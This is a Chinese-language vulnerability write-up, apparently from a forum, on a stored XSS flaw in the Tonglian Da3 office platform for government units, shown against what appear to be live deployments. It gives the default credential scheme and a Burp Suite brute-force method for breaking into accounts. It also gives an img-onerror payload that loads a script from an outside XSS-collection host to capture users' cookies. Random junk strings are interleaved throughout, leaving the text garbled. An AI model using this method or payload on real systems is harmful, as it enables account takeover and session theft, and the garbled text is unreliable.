O( `7 j6 v# U G: k
, J" K& S6 t1 t q 同联Da3协同办公平台后台通用储存型xss漏洞
( A% M2 ^9 ]5 G! U- N: F' E8 I" Z8 l
1 Q+ ]( ?! a3 V) x* y# S) ~
4 p3 Y% [+ y/ @- Z( V 平台简介:* @+ V' _4 A# p( E
7 @( Q* n5 o6 G0 N
+ ]4 t% L4 h7 M# c1 ~5 x* w# j0 u
% ^( q! a4 R$ Q: ^. [5 f5 y
: Z6 t$ ]2 T/ L
" e4 `' W9 x5 g) _ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 A( J$ n+ t: a! C, p* @7 v同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; F8 m0 j5 `" z% t# @
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 Z- A: H. s0 l0 A. h) N
- F1 w" X# }/ K # g) U- j% t; h+ p5 T# i
$ R6 o& y! P5 ~2 L9 M- P0 f9 O
# m' O% a1 P% A+ d
; i2 ?" W1 D6 ?4 a+ F8 Y9 D 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 Y) F/ P+ C T% R) d
}% ?# `) y! f: u# @7 ~0 [# z5 K
]( x4 k4 ~9 s6 }* o9 J
. a& H$ A. J% |* b
?% X: @; t/ M3 X: K
4 R! h0 l, {; Y# `1 Q- H http://1.1.1.1:7197/cap-aco/#(案例2-)
$ W0 `9 e; l s s: s$ T$ H! z% f4 z
" K) Q7 B8 b5 Y3 D3 t3 D
7 T: ^; Q$ e k http://www.XXOO.com (案例1-官网网站): b' Z0 D2 z3 U
; G5 f$ ]8 ], K/ V
# N6 ~* D* O+ Q
漏洞详情:
2 H ^+ m/ k6 ]' v7 q; w1 {( S
) `; {6 j1 |; K0 | ; J5 |" i# j' {) ^
案例一、
: f# Y3 H- ^2 `+ V" c; ~6 z. C5 N( F( b1 G
" \. e# R* @" K# r5 }0 n) V
- Z3 b+ c1 n6 c+ P' p; Y- Q! r" C 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% f! g% |( F; F, m, y, A' f
W4 m0 ^3 v3 |2 j5 s
# L* y$ C( |+ o4 A# z 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
( W0 h9 I( l! U& f! T* T
% I6 h9 D3 {( @8 o J8 T ) O' W2 u6 ?6 |
8 t( z, R: K9 D2 b
/ u* c$ \/ R3 \9 h- I8 l) g) V$ Y- x / I' f# K% Y k% p
: L4 C: ~- T5 u
. [! P: Z3 v8 y" b # x. o% D8 K* r1 {# Z& C w$ V+ K
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
4 ]* G+ r6 }( M* a6 \, e
9 q% ^2 E/ n5 s! l- Y l6 ? - e; K; E, N3 b$ b$ u! W
. U4 G' D' [' a# L5 k7 X
d# J; G) f% l$ g' D& n
. @$ T' U! s$ Z/ _9 I) [
, U4 O. ?2 B0 ^' G
& }' \# y' M% Y# C" w ; s+ O0 v. k( e" ^3 A( C$ b1 t+ k! `
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
% K# v# R$ ]5 [4 X0 h! y' Q: y# x
: J* G* {) ^' d+ O4 x6 q+ n B/ J% f, f# }0 }8 P1 m
8 q. d7 a( k7 p H* j1 C
* {0 x9 B( O8 z* x/ G5 _
E! N& r& R" Y5 s8 \/ S <img src=x
4 H4 ?/ a9 t1 Vonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
) u1 N! _2 a" H! D( D2 ^1 G
: w$ y' n; T- d5 F D) Z
0 X% Y) J: R8 u* h' n; i
3 D# t7 U7 N8 H8 I: S( X2 R
) Q7 q2 W! ^! w, J6 s; p) E
& I/ M! b' }. h* D8 M) K 然后发送,接收cookie如图:
/ g( @9 k% f* w& p! K+ y
' F s$ C) l0 X! m/ m
" @5 D4 s& l( M) @# H. c
' @6 h* x& r) ?. [0 ]4 D
0 Z( k( @. C& P: B0 \
) u ?! {( ^; Y& s * j# |6 ?2 x$ Z+ Q r' k
% ^ x/ u& G" a
6 v; R5 \1 ^. |; A: k7 B1 Y % e/ T" U* I$ `: [) t {
/ b$ U$ ~2 F: `3 K- Y
& e3 J$ V& o1 J6 C . T6 l! `" x6 i4 a* h0 j
- R* C) a7 `+ v
* z$ k- q: u: i* B# o5 W7 P
8 O: @- f. n$ M V# z m1 w
$ }4 U( f6 E* }# ]" V
2 e! D P4 _- A4 @
- B% D7 G$ k0 g5 R( r
: G, V& W# l3 L$ t7 e/ n7 D
m) ]6 v8 D; X, H
! K* b. u1 v9 s+ J0 V. I
' p0 |$ Y' V7 |6 x( S9 A) [9 h7 T " ` P( _2 q% s
案例2、
) V3 \& r- s! g
{# J; k2 ]5 ?. F/ \3 J " c. j& m. A5 a* M# s
前面步骤都一样,下面看效果图: $ y8 E6 E% d. [8 K
4 U" f# n' r) T | 0 l4 I2 Z/ } Q- m5 M. M! ~# N" {
8 }; P* n$ o* v& Q# i
3 o3 Y+ e N) P9 E( E: a3 E
' b% r+ s, [7 U6 ]- y5 t, w% |: X
2 h1 Q* K* W/ y. a/ a- b
6 y( R \& Q! b* {' l7 G6 a
. Q: J; x$ B+ M
+ O' t. I- n: R$ V$ P1 V
. v, N G( W! n) X7 c( n2 J' Y 6 _8 X% b5 i4 u$ m
- B+ | |9 I6 c' D5 _, D
6 ~: v4 T9 x$ A! r9 m$ u
" f2 U, z; ]& W8 w z- P& u# H5 R0 r
7 B6 O/ e7 B; C# Q
N0 X1 M Y1 Q
) P& u! i/ D; V6 {" Z0 R& i ! ~( S" {. |! A6 L
" q8 V0 u1 J. E6 p8 a8 j: k
" Y# d- L& l; E0 h) M4 ~( b+ X
9 @( @+ X% d9 U$ q/ w
% p/ Y2 `' l" V7 l( F0 z
9 @" ~0 x& y" U5 i8 Z; ^2 X
* ~' r' b# E. L% D
* ]# A1 n5 a0 r6 U8 S
" J! t& @, S6 L' n G- J+ ]7 t7 ]
% F1 ?, x" H% N
; ~" M$ F2 p9 w